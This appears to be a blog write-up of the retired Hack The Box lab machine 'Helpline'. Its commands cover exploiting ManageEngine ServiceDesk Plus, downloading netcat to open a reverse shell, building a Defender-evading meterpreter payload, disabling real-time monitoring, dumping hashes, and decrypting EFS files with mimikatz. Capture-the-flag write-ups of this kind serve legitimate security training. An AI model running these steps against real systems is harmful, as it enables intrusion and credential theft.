Skip to main content

Helpline Writeup - Hack The Box (Retired)


Helpline is one of the more advanced and difficult machines on Hack The Box. There is more than one solution to many of the parts of this machine; however, it ultimately leads to some necessary cryptography at the end. What's more interesting is that this box highlights the limitations of the NT AUTHORITY\SYSTEM user. The box was created by egre55, a security researcher, sysadmin, and penetration tester.

Initial Foothold

Scanning the host:

nmap -sV -sC -oA nmap/Helpline



135/tcp   open  msrpc         Microsoft Windows RPC

445/tcp   open  microsoft-ds?

5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

8080/tcp  open  http-proxy    -


|     HTTP/1.1 200 OK


|_http-title: ManageEngine ServiceDesk Plus

49667/tcp open  msrpc         Microsoft Windows RPC

Visiting the http server on port 8080, we find a web service running on ManageEngine ServiceDesk Plus running version 9.3

Researching the application yields a privilege escalation vulnerability (CVE-2019-10008) and a proof of concept written in python on exploitdb.

The default credentials for the guest user appear to be valid by the script:

root@kali:~/htb/Helpline# python
User with low priv: guest:guest
User to bypass authentication to: administrator
Getting a session id
Logging in with low privilege user
Captured authenticated cookies.
Captured secondary sessid.
Doing the magic step 1.
Doing the magic step 2.
Captured target session.Set following cookies on your browser.

Logging in as guest with the default guest credentials, we can adjust our stored cookies in the developer console so we can impersonate the administrator user.

Acquiring a Shell

Command Scheduler

By visiting the Admin tab there is a section called Custom Schedules that allows the help-desk application to locally schedule and execute commands:

Scheduling the command below, we can download a portable netcat windows binary from our machine.

powershell.exe "IWR -Uri -OutFile nc.exe"

If we schedule a second command using the netcat binary, we can create a reverse shell back to us from the web server:

powershell.exe -exec bypass -c ".\nc.exe 1337 -e powershell.exe"

Both commands are successful, and we are running as the system user on the E drive.

We can search and enumerate user directories with the Get-ChildItem cmdlet:

gci -recurse C:\Users\ | where { ! $_.PSIsContainer } | select fullname | findstr /i /v "url lnk"

Oddly, as the system user and after running both takeown and icacls on user.txt, we still do not have privileges to read any of the files. Let's find out if our file system is encrypted in anyway.
C:\Users\Leo\Documents>Cipher /U /N

Encrypted File(s) on your system:
To access these files, we can try signing in as the users who own them. If we enumerate further, there exists a "C:\Temp\Password Audit\it_logins.txt" file with clear-text creds (this actually isn't very useful for us):

PS C:\Temp\Password Audit> cat 'C:\Temp\Password Audit\it_logins.txt'

local Windows account created

username: alice
password: $sys4ops@megabank!
admin required: no

shadow admin accounts:


User Shell(s)

Creating a Meterpreter Session

Using GreatSCT, we can bypass Windows Defender and create a reverse shell for meterpreter using MSBuild

root@kali:/opt/GreatSCT# ./ 
                             GreatSCT | [Version]: 1.0
      [Web]: | [Twitter]: @ConsciousHacker

Main Menu

 1 tools loaded

Available Commands:

 exit   Exit GreatSCT
 info   Information on a specific tool
 list   List available tools
 update   Update GreatSCT
 use   Use a specific tool

Main menu choice: use 1
GreatSCT-Bypass Menu

 26 payloads loaded

Available Commands:

 back   Go to main GreatSCT menu
 checkvt   Check virustotal against generated hashes
 clean   Remove generated artifacts
 exit   Exit GreatSCT
 info   Information on a specific payload
 list   List available payloads
 use   Use a specific payload

GreatSCT-Bypass command: use 9
Payload: msbuild/meterpreter/rev_tcp selected

Required Options:

Name             Value    Description
----             -----    -----------
DOMAIN           X        Optional: Required internal domain
EXPIRE_PAYLOAD   X        Optional: Payloads expire after "Y" days
HOSTNAME         X        Optional: Required system hostname
INJECT_METHOD    Virtual  Virtual or Heap
LHOST                     IP of the Metasploit handler
LPORT            4444     Port of the Metasploit handler
PROCESSORS       X        Optional: Minimum number of processors
SLEEP            X        Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE         X        Optional: Check to validate not in UTC
USERNAME         X        Optional: The required user account

 Available Commands:

 back         Go back
 exit         Completely exit GreatSCT
 generate     Generate the payload
 options      Show the shellcode's options
 set          Set shellcode option

[msbuild/meterpreter/rev_tcp>>] set lhost

[msbuild/meterpreter/rev_tcp>>] generate

Please enter the base name for output files (default is payload): payload

 [*] Language: msbuild
 [*] Payload Module: msbuild/meterpreter/rev_tcp
 [*] MSBuild compiles for  us, so you just get xml :)
 [*] Source code written to: /usr/share/greatsct-output/source/payload.xml
 [*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/payload.rc

Please press enter to continue >: exit

Have the remote host download payload.xml from your Kali instance and run the Metasploit rc file to setup the handler. Kali:

msfconsole -r payload.rc 

Windows Remote Host

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe .\payload.xml

From your meterpreter session, dump hashes:

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f684313986dcdab719c2950661809893...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


With a user's hash, we can attempt to crack or reverse-lookup the respective hashes in public repositories.

d5312b245d641b3fae0d07493a022622 Unknown Not found.
31d6cfe0d16ae931b73c59d7e0c089c0 NTLM 
31d6cfe0d16ae931b73c59d7e0c089c0 NTLM 
52a344a6229f7bfa074d3052023f0b41 Unknown Not found.
998a9de69e883618e987080249d20253 Unknown Not found.
eef285f4c800bcd1ae1e84c371eeb282 NTLM 0987654321
60b05a66232e2eb067b973c889b615dd Unknown Not found.
35a9de42e66dcdd5d512a796d03aef50 Unknown Not found.
03e2ec7aa7e82e479be07ecd34f1603b Unknown 

Zachary's password is "0987654321" and he is in the Event Log Readers group.

With the administrator hash, we can do a Pass-the-hash attack over psexec, but only if we disable Real-Time Monitoring in Windows defender as NT AUTHORITY\SYSTEM (we no longer need MSBuild to create meterpreter sessions).

Set-MpPreference -DisableRealtimeMonitoring $true

To read the contents of Leo's user directory, we can either migrate our current SYSTEM user process to a process being ran by Leo or impersonate Leo's tokens using incognito.

meterpreter > ps
 4724  5036  ctfmon.exe               x64   1        HELPLINE\leo                  C:\Windows\System32\ctfmon.exe
 4804  3736  postgres.exe             x86   0        NT AUTHORITY\SYSTEM           E:\ManageEngine\ServiceDesk\pgsql\bin\postgres.exe
 4852  596   svchost.exe              x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 4908  904   MSBuild.exe              x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
 5036  596   svchost.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 5180  620   vmtoolsd.exe             x64   1        HELPLINE\leo                  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
meterpreter > migrate 5180
[*] Migrating from 5320 to 5180...
[*] Migration completed successfully.
meterpreter > shell

Process 3280 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved
C:\Windows\system32>type %userprofile%\Desktop\*



This is the administrator's password in a PSCredential format. We will decrypt it later and focus on getting the contents of user.txt. We can dump and search the logs for tolu's password using zachary's credentials in powershelll.

PS C:\Windows\system32>evtutil el > C:\EventLogs.txt
PS C:\Windows\system32>foreach($line in Get-Content C:\Eventlogs.txt) {wevtutil qe /r: /u:HELPLINE\zachary /p:0987654321 $line >> C:\ReadableLogs.txt}

Download ReadableLogs.txt to your Kali instance from meterpreter and convert it to a parse-friendly file.

meterpreter > cd C:/
meterpreter > download ReadableLogs.txt
[*] Downloading: ReadableLogs.txt -> ReadableLogs.txt
[*] Downloaded 1.00 MiB of 75.37 MiB (1.33%): ReadableLogs.txt -> ReadableLogs.txt
[*] download   : ReadableLogs.txt -> ReadableLogs.txt
root@kali:/htb/Helpline# dos2unix ReadableLogs.txt
dos2unix: converting file ReadableLogs.txt to Unix format...
root@kali:~/htb/Helpline# grep tolu ReadableLogs.txt | grep "4688" | grep -o "Command.*" | nl
     1 CommandLine'>"C:\Windows\system32\net.exe" use T: \\helpline\helpdesk_stats /USER:tolu !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event>
     2 CommandLine'>"C:\Windows\system32\systeminfo.exe" /S \\helpline /U /USER:tolu /P !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe<</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event>

User tolu has the password "!zaq1234567890pl!99".
With Powershell Remoting, we can locally authenticate as tolu and read user.txt:

PS C:\Windows\system32>$user = 'HELPLINE\tolu'
PS C:\Windows\system32>$pass= ConvertTo-SecureString '!zaq1234567890pl!99' -AsPlainText -Force

PS C:\Windows\system32>$cred = New-Object System.Management.Automation.PSCredential($user, $pass) 
PS C:\Windows\system32>Invoke-Command -ComputerName HELPLINE -Credential $cred -Authentication credssp -ScriptBlock {type c:\Users\tolu\Desktop\user.txt}


Privilege Escalation to Administrator

Reading root.txt

Using the encrypted PSCredentials from earlier, we can determine the plaintext credentials with powershell, sign in as administrator, and create a stable reverse shell from earlier's netcat binary

PS C:\Users\leo\Desktop\>$user = 'HELPLINE\Administrator'
PS C:\Users\leo\Desktop\>$file = '.\admin-pass.xml'
PS C:\Users\leo\Desktop\>$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,(Get-Content $file | ConvertTo-SecureString)
PS C:\Users\leo\Desktop\>$cred.GetNetworkCredential().password
PS C:\Users\leo\Desktop\>$securePassword = ConvertTo-SecureString -AsPlainText -Force 'mb@letmein@SERVER#acc'
PS C:\Users\leo\Desktop\>$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
PS C:\Users\leo\Desktop\>Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\Administrator\Documents> C:\Temp\nc.exe -e powershell.exe 1337
PS C:\Users\Administrator\Documents> cat ~\Desktop\root.txt
cat : Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.

The file is still encrypted. Return to the user who encrypted the file with the administrator's credentials (NT Authority\SYSTEM) and decrypt the EFS with mimikatz (mimikatz should be written to a writable path).

PS C:\Users\Administrator\Desktop>Cipher /C C:\Users\Administrator\Desktop\root.txt
 Listing C:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    HELPLINE\Administrator [Administrator(Administrator@HELPLINE)]
    Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3 

  No recovery certificate found.

  Key information cannot be retrieved.

The specified file could not be decrypted.

  .#####.   mimikatz 2.2.0 (x86) #18362 Aug 14 2019 01:31:19
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( )
 ## \ / ##       >
 '## v ##'       Vincent LE TOUX             ( )
  '#####'        > /   ***/

mimikatz # crypto::system /file:C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3 /export

* File: 'C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3'
  Provider info:
 Key Container  : 3dd3e213-bce6-4acb-808c-a1b3227ecbde
 Provider       : Microsoft Enhanced Cryptographic Provider v1.0
 Provider type  : RSA_FULL (1)
 Type           : AT_KEYEXCHANGE (0x00000001)
 Flags          : 00000000
 Param (todo)   : 00000000 / 00000000

[0003/1] SHA1_HASH_PROP_ID
[0020/1] cert_file_element
  Data: 30820314308201fca0030201020210194a705262024cab4094533eed3561f8300d06092a864886f70d01010505003018311630140603550403130d41646d696e6973747261746f723020170d3138313232333139353533345a180f32313138313132393139353533345a3018311630140603550403130d41646d696e6973747261746f7230820122300d06092a864886f70d01010105000382010f003082010a0282010100c33c505d59ea1dd47306b84f92833d5b33f9c6422a546368176de4b3dbbd29730192b43273ad98f3719d657176d7586e841bcb177d5e3275f092155c7c422180964a024d5d982982610860aec5525e58523d7633512b264de41a46ee7cd89c26a5a013f5a9fb1eed992f98c0ab5be241b1c796e74ba5924b7d074f15ee67534e089b86bc43d670832404fe63a9cdf5ccf84532ef8bf800597de0f4553785e516f91255be7cae47ba99cce2c1d2bda076074da0e66de4ec9e7bd4f67b49bcf896ba8f20554eeac4f28b0588378fd435dba1d4d5bd2667fa79a47835b9c834dbc0d65b067dd09ac49f31c5737665af8e3a66514135b3e5d482a7e66e7111b689390203010001a358305630150603551d25040e300c060a2b0601040182370a030430320603551d11042b3029a027060a2b060104018237140203a0190c1741646d696e6973747261746f724048454c504c494e450030090603551d1304023000300d06092a864886f70d01010505000382010100967ac2ac65fe0cb96583240be69e81173546a6d817951e338aa58d7c5e8f2b96c2af6c2a758800c086eb8cb55a525c4f85af2311ac6e655a7a071f719b5a776de45edc699bbd47bcb9b235595990bcf518d20635d297aa576b97932248414d2f1ac849d525379065f5f4c640cc9ebac0a2c240263c08ef4c54e9c9a6b08dd0cf4eb78e1d5e7341b1a950045c2d3233554aeff1294d300e0a5cf75eaf832b76c0fa96e7e3a4c28ddb639d366da1e0f3af91d678c22acd980890af1372f37954d503e133261a078a161d9cba85dd28b2ef0eebffb1b8ae0980c7978021b01fcf0dc5f282ab67be4540418b05a627b6b34b06bf5283b00efb3a32ae651e132eb3d3
  Saved to file: FB154575993A250FE826DBAC79EF26C211CB77B3.der

... //Follow the path to the private key location (directory is hidden)
C:\Temp\mimikatz\Win32>dir /a C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85
... //Command to get Private key's masterkey
mimkatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85
... //Command to decrypt Master Key
mimikatz # dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:mb@letmein@SERVER#acc
Auto SID from path seems to be: S-1-5-21-3107372852-1132949149-763516304-500

[masterkey] with password: mb@letmein@SERVER#acc (normal user)
  key : 8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8
  sha1: b18974052cb509a86a008869fd95388550678184
... //Command to decrypt private key
mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85" 
... //Private key is decrypted -> raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk
... //Must download private keys locally to forge a certificate that will let us read root.txt
root@kali:~/htb/Helpline# openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out public.pem
root@kali:~/htb/Helpline# openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk -out private.pem
writing RSA key
root@kali:~/htb/Helpline# openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
... //Upload and import cert

C:\Users\Administrator\Desktop>certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot
Certificate "Administrator" added to store.

CertUtil: -importPFX command completed successfully.

C:\Users\Administrator\Desktop>type root.txt
type root.txt

Congratulations, you pwned a not-so easy machine!
It personally took me a week to finish a box of this magnitude and difficulty. There were a few misleading plain-text credentials in the Web API and a few other places stored locally on the box, so it was very easy to fall into a rabbit hole for a few hours or longer.

Rayce Toms

Student Researcher


Popular posts from this blog

Bastion Writeup - Hack The Box (Retired)

Summary: Bastion was one of the first few easy boxes that initially introduced me to HackTheBox . Created by L4mpje , a security enthusiast and hobbyist hacker, this box covers realistic Windows environment misconfigurations like unauthenticated file-shares and vulnerable apps with insecure password storage. Finding a Foothold Initial Enumeration: root@kali : ~/htb/ # nmap -sV -sC -oA nmap/Bastion Starting Nmap 7.80 ( ) at 2019-09-05 13:31 AKDT Nmap scan report for Host is up (0.50s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn

Unattended Writeup - Hack The Box (Retired)

Summary: Unattended is a challenging CTF-Like machine created by Hack The Box user @guly . This Linux box is surprisingly more difficult than most medium level boxes and truly tests SQL injection knowledge by forcing users to not entirely rely on automated tools, but to think creatively so they can manually "incept" nested queries to achieve LFI. This ultimately leads to RCE and a shell after log poisoning. With additional enumeration and subtle sysadmin knowledge, we are able to escalate to the root user. Finding a Foothold Initial Enumeration: root@kali : ~/htb/ # nmap -sV -sC -oA nmap/Unattended Starting Nmap 7.80 ( ) at 2019-08-22 19:45 AKDT Nmap scan report for www.nestedflanders.htb ( Host is up (0.20s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.10.3 |_http-server-header: nginx/1.10.3 |_http-title: Did not follow redirect to

OneTwoSeven Writeup - Hack The Box (Retired)

Summary: OneTwoSeven is a creatively designed realistic box by Hack The Box user @jkr . The foothold for this Linux box craftily utilizes symbolic links and port forwarding through sftp to gain access to the admin interface. This ultimately leads to RCE and a shell after some addon-based web exploitation. For escalating to the root user, we take advantage of the available apt sudo commands while performing a man-in-the-middle package injection via http-proxy. I have seen a similar, if not the same attack (slide 26), executed as part of Red Team's arsenal at the National Collegiate Cyber Defense Competition . Finding a Foothold Initial Enumeration: root@kali : ~/htb/ # nmap -sV -sC -oA nmap/OneTwoSeven Starting Nmap 7.80 ( ) at 2019-08-08 22:04 AKDT Nmap scan report for Host is up (0.12s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh